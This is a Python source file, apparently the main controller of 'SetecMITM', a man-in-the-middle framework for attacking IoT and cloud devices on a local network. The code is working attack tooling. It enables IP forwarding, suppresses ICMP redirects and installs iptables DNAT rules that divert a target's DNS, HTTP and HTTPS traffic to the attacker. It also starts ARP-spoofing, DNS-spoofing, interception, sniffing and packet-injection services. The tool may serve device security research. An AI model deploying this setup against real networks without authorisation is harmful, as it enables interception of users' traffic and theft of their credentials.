#!/usr/bin/env python3 """ SetecMITM — generic IoT / cloud-device MITM framework. Drop-in framework for ARP spoofing, DNS hijacking, HTTP/HTTPS interception, UDP capture, raw sniffer, intruder detection, and packet injection against any device on the LAN. Target-specific logic (vendor cloud clients, CVE verifiers, fuzzer wordlists) lives in `targets//` plugins. Run with: sudo /usr/bin/python3 mitm.py or via the PyQt6 GUI: sudo /usr/bin/python3 gui.py """ import os import sys import signal import threading import time sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) from config import Config from utils.log import ( log, log_lines, init_logfile, close_logfile, lock, C_NONE, C_ERROR, C_SUCCESS, C_INFO, C_TRAFFIC, C_IMPORTANT, ) from services import ( arp_spoof, dns_spoof, http_server, udp_listener, sniffer, intruder_watch, ) from inject import packet SERVICE_DEFS = [ # (name, runner_factory) ("arp", lambda cfg, flags, ck: arp_spoof.run(cfg, flags, ck)), ("dns", lambda cfg, flags, ck: dns_spoof.run(cfg, flags, ck)), ("http", lambda cfg, flags, ck: http_server.run_http(cfg, flags, ck)), ("https", lambda cfg, flags, ck: http_server.run_https(cfg, flags, ck)), ("sniffer", lambda cfg, flags, ck: sniffer.run(cfg, flags, ck)), ("intruder", lambda cfg, flags, ck: intruder_watch.run(cfg, flags, ck)), ] SERVICE_NAMES = [s[0] for s in SERVICE_DEFS] SERVICE_BY_NAME = {s[0]: s for s in SERVICE_DEFS} class Controller: """ Service supervisor. Owns the iptables redirect rules, per-service on/off state, and the loaded target plugin (if any). """ def __init__(self): self.cfg = Config() self.flags = {} self.running = True self.services_running = False self._svc_running = {n: False for n in SERVICE_NAMES} self._iptables_up = False self.plugin = None self._load_plugin() # ─── plugin loader ──────────────────────────────────── def _load_plugin(self): name = self.cfg.get("target_plugin", "") if not name: return try: mod = __import__(f"targets.{name}.plugin", fromlist=["Plugin"]) self.plugin = mod.Plugin(self.cfg) log(f"plugin loaded: {name}", C_SUCCESS) except Exception as e: log(f"plugin load failed ({name}): {e}", C_ERROR) # ─── iptables ───────────────────────────────────────── def _ensure_iptables(self): if self._iptables_up: return if not self.cfg["target_ip"] or not self.cfg["our_ip"]: log("iptables: target_ip and our_ip must be set", C_ERROR) return os.system("pkill -f arpspoof 2>/dev/null") os.makedirs(self.cfg["log_dir"], exist_ok=True) self._setup_iptables() self._iptables_up = True def _setup_iptables(self): tgt = self.cfg["target_ip"] us = self.cfg["our_ip"] cmds = [ "sysctl -w net.ipv4.ip_forward=1", "iptables -A OUTPUT -p icmp --icmp-type redirect -j DROP", f"iptables -t nat -A PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53", f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80", f"iptables -t nat -A PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443", ] for c in cmds: os.system(c + " >/dev/null 2>&1") log("iptables rules applied", C_INFO) def _cleanup_iptables(self): tgt = self.cfg["target_ip"] us = self.cfg["our_ip"] cmds = [ "iptables -D OUTPUT -p icmp --icmp-type redirect -j DROP", f"iptables -t nat -D PREROUTING -s {tgt} -p udp --dport 53 -j DNAT --to-destination {us}:53", f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 80 -j DNAT --to-destination {us}:80", f"iptables -t nat -D PREROUTING -s {tgt} -p tcp --dport 443 -j DNAT --to-destination {us}:443", ] for c in cmds: os.system(c + " >/dev/null 2>&1") # ─── per-service control ────────────────────────────── def start_service(self, name): if name not in SERVICE_BY_NAME: log(f"unknown service: {name}", C_ERROR) return if self._svc_running.get(name): log(f"{name} already running", C_ERROR) return self._ensure_iptables() if name == "http": os.system("fuser -k 80/tcp 2>/dev/null") elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null") elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null") time.sleep(0.2) self._svc_running[name] = True check = lambda n=name: self.running and self._svc_running.get(n, False) runner = SERVICE_BY_NAME[name][1] threading.Thread( target=lambda: runner(self.cfg, self.flags, check), daemon=True, name=f"svc-{name}", ).start() self.services_running = any(self._svc_running.values()) log(f"started: {name}", C_SUCCESS) def stop_service(self, name): if not self._svc_running.get(name): log(f"{name} not running", C_ERROR) return self._svc_running[name] = False log(f"stopping: {name}…", C_INFO) if name == "http": os.system("fuser -k 80/tcp 2>/dev/null") elif name == "https": os.system("fuser -k 443/tcp 2>/dev/null") elif name == "dns": os.system("fuser -k 53/udp 2>/dev/null") time.sleep(0.5) self.flags[name] = False self.services_running = any(self._svc_running.values()) def toggle_service(self, name): if self._svc_running.get(name): self.stop_service(name) else: self.start_service(name) def start_services(self): if self.services_running: log("services already running", C_ERROR) return self._ensure_iptables() # Honour auto_* config flags for name in SERVICE_NAMES: key = f"auto_{name}" if self.cfg.get(key, True): self.start_service(name) time.sleep(0.3) # Optional UDP listeners for port in self.cfg.get("auto_udp_ports", []) or []: threading.Thread( target=lambda p=port: udp_listener.run(p, self.cfg, self.flags, lambda: self.running and self.services_running), daemon=True, name=f"svc-udp{port}", ).start() time.sleep(0.2) log("all services started", C_SUCCESS) def stop_services(self): if not self.services_running: log("services not running", C_ERROR) return log("stopping all services…", C_INFO) for name in SERVICE_NAMES: if self._svc_running.get(name): self.stop_service(name) time.sleep(1) self._cleanup_iptables() self._iptables_up = False self.flags.clear() self.services_running = False log("services stopped", C_INFO) def inject_packet(self, params): return packet.inject(self.cfg, params) def main(): if os.geteuid() != 0: print("Run with: sudo /usr/bin/python3 mitm.py") sys.exit(1) ctrl = Controller() init_logfile(f"{ctrl.cfg['log_dir']}/setec_mitm.log") # Headless mode — start everything and wait. The full curses TUI from # cam-mitm is not bundled here; use gui.py instead. log("setec-mitm headless mode. Use gui.py for the full UI.", C_INFO) ctrl.start_services() def shutdown(*_): log("shutting down…", C_INFO) ctrl.stop_services() ctrl.running = False close_logfile() sys.exit(0) signal.signal(signal.SIGINT, shutdown) signal.signal(signal.SIGTERM, shutdown) while ctrl.running: time.sleep(0.5) if __name__ == "__main__": main()